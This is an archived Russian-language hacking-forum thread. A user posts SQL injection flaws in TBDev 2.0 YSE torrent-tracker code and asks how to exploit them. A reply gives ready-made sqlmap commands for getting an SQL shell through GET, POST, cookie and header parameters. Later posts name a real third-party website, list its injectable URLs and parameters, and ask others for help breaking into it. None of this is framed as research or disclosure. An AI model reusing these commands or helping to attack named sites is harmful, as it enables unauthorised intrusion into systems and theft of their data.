ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

05.03.2013, 16:02
|
|
Guest
Сообщений: n/a
Провел на форуме: 15180
Репутация:
0
|
|
Нашел следующие уязвимости в скриптах:
Торрент-трекеры основанные на TBDev 2.0 YSE
1.
Уязвимость позволяет удалённому пользователю сформировать спец. атакующий url адрес и тем самым выполнять произвольный SQL запрос.
./announce.php
Код:
Code:
$snatch_updateset[] = "completedat = $dt";
$snatch_updateset[] = "uploaded = uploaded + $uploaded2";
$snatch_updateset[] = "downloaded = downloaded + $downloaded2";
$snatch_updateset[] = "to_go = $left";
$snatch_updateset[] = "port = $port";
$snatch_updateset[] = "last_action = $dt";
2.
Уязвимость позволяет удаленному пользователю выполнить произвольный SQL запрос в атакуемой системе.
Уязвимость существует из-за не достаточной проверки входящего параметра code при вводе кода.
Класс данной уязвимости низкий, по причине, того что воспользоваться ей можно если только на сервере стоит error_reporting не ниже E_WARNING.
./bonuscode.php
Код:
Code:
$res = sql_query("SELECT * FROM bonusgen WHERE pid = '".$s."'");
3.
Не достаточная фильтрация входящих данных дает возможность совершить атаки на файлы rss.php, announce.php, takesignup.php b на другие файлы где используется функция sqlesc(). Это связано с тем что функция sqlesc() экранирует только параметры string. Если же входящие параметры были распознаны как numeric то они не экранируются.
./include/functions.php
Код:
Code:
function sqlesc($value) {
// Stripslashes
/*if (get_magic_quotes_gpc()) {
$value = stripslashes($value);
}*/
// Quote if not a number or a numeric string
if (!is_numeric($value)) {
$value = "'" . mysql_real_escape_string($value) . "'";
}
return $value;
}
./include/functions_announce.php
Код:
Code:
function sqlesc($value) {
// Stripslashes
/*if (get_magic_quotes_gpc()) {
$value = stripslashes($value);
}*/
// Quote if not a number or a numeric string
if (!is_numeric($value)) {
$value = "'" . mysql_real_escape_string($value) . "'";
}
return $value;
}
Подскажите, как их можно использовать?
А может кто знает еще типичные уязвимости этого релиза?
Спасибо
|
|
|
|

05.03.2013, 16:03
|
|
Guest
Сообщений: n/a
Провел на форуме: 34457
Репутация:
-10
|
|
Скачал актив perl установил денвер.Дайте кто-то ссылку на рабочий exploit для проверки,например в faq.php в Vbulletin. Спасибо.
|
|
|
|

05.03.2013, 16:51
|
|
Guest
Сообщений: n/a
Провел на форуме: 118953
Репутация:
37
|
|
Сообщение от zloy_fantom
zloy_fantom said:
2.
Уязвимость позволяет удаленному пользователю выполнить произвольный SQL запрос в атакуемой системе.
Уязвимость существует из-за не достаточной проверки входящего параметра code при вводе кода.
Класс данной уязвимости низкий, по причине, того что воспользоваться ей можно если только на сервере стоит error_reporting не ниже E_WARNING.
./bonuscode.php
Код:
$res = sql_query("SELECT * FROM bonusgen WHERE pid = '".$s."'");
в случае если параметр передается явно в GET запросе и именем s, по условию исключаем Error-Based и Union техники то SQL-shell можно будет вызвать:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php?s=1" --technique="BT" --level=5 --sql-shell
в POST параметре s:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --data="s=1" --technique="BT" --level=5 --sql-shell
в Cookie параметре s:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --cookie="s=1" --technique="BT" --level=5 --sql-shell
в Referer:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --p referer --technique="BT" --level=5 --sql-shell
в User-Agent:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --p user-agent --technique="BT" --level=5 --sql-shell
в любом добавочном хидере:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --headers="Accept-Language: fr\nETag: 1%1" --technique="BT" --level=5 --sql-shell
и т.д.
|
|
|
|

05.03.2013, 18:00
|
|
Guest
Сообщений: n/a
Провел на форуме: 15180
Репутация:
0
|
|
\/IRUS
Большое спасибо, буду пробовать
|
|
|
|

05.03.2013, 19:10
|
|
Новичок
Регистрация: 23.03.2009
Сообщений: 14
Провел на форуме: 74797
Репутация:
0
|
|
ne kak ne mogu podobrat union+select , vashe ne chego ne xochet ponimat etot sayt , mojet kto nebud xotabi zacepku podkinut
http://www.pixheaven.net/bestof.php?begin=276&entout=12'
ili
http://www.pixheaven.net/photo.php?nom=120906_9930-46'
|
|
|

05.03.2013, 21:16
|
|
Guest
Сообщений: n/a
Провел на форуме: 77731
Репутация:
33
|
|
Сообщение от borntobebad
borntobebad said:
ne kak ne mogu podobrat union+select , vashe ne chego ne xochet ponimat etot sayt , mojet kto nebud xotabi zacepku podkinut
http://www.pixheaven.net/bestof.php?begin=276&entout=12'
ili
http://www.pixheaven.net/photo.php?nom=120906_9930-46'
что-то я тоже не могу вдуплить
просмотрел сайт, вот эти уязвимые к sql-inj параметры:
Код:
Code:
/bestof.php
begin
entout
/bestof_us.php
begin
entout
/blog.php
begin
/blog_us.php
begin
/livredor_lire.php
begin
/livredor_lire_us.php
begin
/maj.php
begin
/maj_us.php
begin
/photo
nom
/photo.php
nom
/photo_us
nom
/publications_site.php
begin
/publications_site_us.php
begin
/recherche_quoi.php
Afficher
begin
entout
/recherche_quoi_us.php
Afficher
begin
entout
/wallpapers.php
begin
entout
/wallpapers_us.php
begin
entout
но ни один не смог раскрутить...
|
|
|
|

05.03.2013, 22:13
|
|
Guest
Сообщений: n/a
Провел на форуме: 344922
Репутация:
75
|
|
Сообщение от borntobebad
borntobebad said:
ne kak ne mogu podobrat union+select , vashe ne chego ne xochet ponimat etot sayt , mojet kto nebud xotabi zacepku podkinut
http://www.pixheaven.net/bestof.php?begin=276&entout=12'
ili
http://www.pixheaven.net/photo.php?nom=120906_9930-46'
иньекция в лимите, поэтому ничего и не выходит
|
|
|
|

05.03.2013, 22:17
|
|
Новичок
Регистрация: 23.03.2009
Сообщений: 14
Провел на форуме: 74797
Репутация:
0
|
|
kokoy progoy ti naskanil eti dannie ? GhostW
|
|
|

05.03.2013, 22:19
|
|
Новичок
Регистрация: 23.03.2009
Сообщений: 14
Провел на форуме: 74797
Репутация:
0
|
|
qaz , tak tipo ne-kak ne razkrutit ?
|
|
|

05.03.2013, 23:28
|
|
Guest
Сообщений: n/a
Провел на форуме: 118953
Репутация:
37
|
|
Сообщение от borntobebad
borntobebad said:
qaz , tak tipo ne-kak ne razkrutit ?
нетс
|
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|